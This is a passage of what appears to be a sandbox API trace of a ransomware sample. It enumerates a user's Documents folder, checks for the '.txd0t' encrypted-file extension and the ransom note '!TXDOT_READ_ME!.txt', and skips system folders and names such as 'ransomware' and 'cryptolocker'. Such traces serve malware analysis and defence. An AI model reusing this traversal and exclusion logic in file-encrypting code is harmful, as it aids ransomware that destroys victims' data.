lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8695d80, ftCreationTime.dwHighDateTime=0x1d5e7fb, ftLastAccessTime.dwLowDateTime=0xb960170, ftLastAccessTime.dwHighDateTime=0x1d5e567, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1009d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ut8OaMa5zK99bj4EvRQ.csv.txd0t", cAlternateFileName="UT8OAM~1.TXD")) returned 1 [0090.129] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv.txd0t", psz2=".") returned 1 [0090.129] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv.txd0t", psz2="..") returned 1 [0090.129] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="ut8OaMa5zK99bj4EvRQ.csv.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t" [0090.130] PathFindExtensionW (pszPath="ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned=".txd0t" [0090.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.130] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea6c390, ftCreationTime.dwHighDateTime=0x1d5ed80, ftLastAccessTime.dwLowDateTime=0x860206d0, ftLastAccessTime.dwHighDateTime=0x1d5e43f, ftLastWriteTime.dwLowDateTime=0x518c002b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3345, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yvlM_ciBT0jsrUW.pptx.txd0t", cAlternateFileName="YVLM_C~1.TXD")) returned 1 [0090.130] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx.txd0t", psz2=".") returned 1 [0090.130] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx.txd0t", psz2="..") returned 1 [0090.130] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="yvlM_ciBT0jsrUW.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t" [0090.130] PathFindExtensionW (pszPath="yvlM_ciBT0jsrUW.pptx.txd0t") returned=".txd0t" [0090.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.130] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 1 [0090.130] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2=".") returned 1 [0090.130] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2="..") returned 1 [0090.130] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Z5Oif6_Mr_Ui", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system32\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\local\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.130] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\boot\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\perflogs\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\programdata\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\drivers\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\wsus\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="crypt_detect") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="cryptolocker") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="ransomware") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\WINDOWS") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.131] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files") returned 0x0 [0090.131] GetProcessHeap () returned 0xe30000 [0090.131] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ce) returned 0xec7a60 [0090.131] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\*", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*" [0090.131] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0090.131] StrCmpW (psz1=".", psz2=".") returned 0 [0090.131] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.131] StrCmpW (psz1="..", psz2=".") returned 1 [0090.131] StrCmpW (psz1="..", psz2="..") returned 0 [0090.131] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x518e615d, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x518e615d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5190c39f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.131] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.131] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.131] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0090.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt" [0090.132] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.132] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.132] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.132] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f62f110, ftCreationTime.dwHighDateTime=0x1d5e689, ftLastAccessTime.dwLowDateTime=0xee412150, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x518e615d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x163c1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="2o _xfnucm3wfE92We.ods.txd0t", cAlternateFileName="2O_XFN~1.TXD")) returned 1 [0090.132] StrCmpW (psz1="2o _xfnucm3wfE92We.ods.txd0t", psz2=".") returned 1 [0090.132] StrCmpW (psz1="2o _xfnucm3wfE92We.ods.txd0t", psz2="..") returned 1 [0090.132] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0090.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="2o _xfnucm3wfE92We.ods.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t" [0090.132] PathFindExtensionW (pszPath="2o _xfnucm3wfE92We.ods.txd0t") returned=".txd0t" [0090.132] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.132] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48075b0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xa970ba70, ftLastAccessTime.dwHighDateTime=0x1d5e19d, ftLastWriteTime.dwLowDateTime=0x5190c39f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17872, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="cpdJYzaQxXso.odt.txd0t", cAlternateFileName="CPDJYZ~1.TXD")) returned 1 [0090.132] StrCmpW (psz1="cpdJYzaQxXso.odt.txd0t", psz2=".") returned 1 [0090.132] StrCmpW (psz1="cpdJYzaQxXso.odt.txd0t", psz2="..") returned 1 [0090.132] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0090.132] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="cpdJYzaQxXso.odt.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t" [0090.133] PathFindExtensionW (pszPath="cpdJYzaQxXso.odt.txd0t") returned=".txd0t" [0090.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.133] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e69320, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa1e87b90, ftLastAccessTime.dwHighDateTime=0x1d5ec0f, ftLastWriteTime.dwLowDateTime=0x5193586a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xc1fa, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="ivPZqJfxmHT.pps.txd0t", cAlternateFileName="IVPZQJ~1.TXD")) returned 1 [0090.133] StrCmpW (psz1="ivPZqJfxmHT.pps.txd0t", psz2=".") returned 1 [0090.133] StrCmpW (psz1="ivPZqJfxmHT.pps.txd0t", psz2="..") returned 1 [0090.133] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0090.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="ivPZqJfxmHT.pps.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t" [0090.133] PathFindExtensionW (pszPath="ivPZqJfxmHT.pps.txd0t") returned=".txd0t" [0090.133] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.133] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="jDtkUz0kU8", cAlternateFileName="JDTKUZ~1")) returned 1 [0090.133] StrCmpW (psz1="jDtkUz0kU8", psz2=".") returned 1 [0090.133] StrCmpW (psz1="jDtkUz0kU8", psz2="..") returned 1 [0090.133] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0090.133] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="jDtkUz0kU8", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system32\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\local\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\boot\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\perflogs\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\programdata\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\drivers\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\wsus\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.133] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="crypt_detect") returned 0x0 [0090.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="cryptolocker") returned 0x0 [0090.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="ransomware") returned 0x0 [0090.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\WINDOWS") returned 0x0 [0090.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.134] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files") returned 0x0 [0090.134] GetProcessHeap () returned 0xe30000 [0090.134] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e4) returned 0xec7f38 [0090.134] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.134] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\*", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*" [0090.134] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0090.134] StrCmpW (psz1=".", psz2=".") returned 0 [0090.134] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0x521649ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.134] StrCmpW (psz1="..", psz2=".") returned 1 [0090.134] StrCmpW (psz1="..", psz2="..") returned 0 [0090.134] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519589ba, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x519589ba, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519589ba, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, 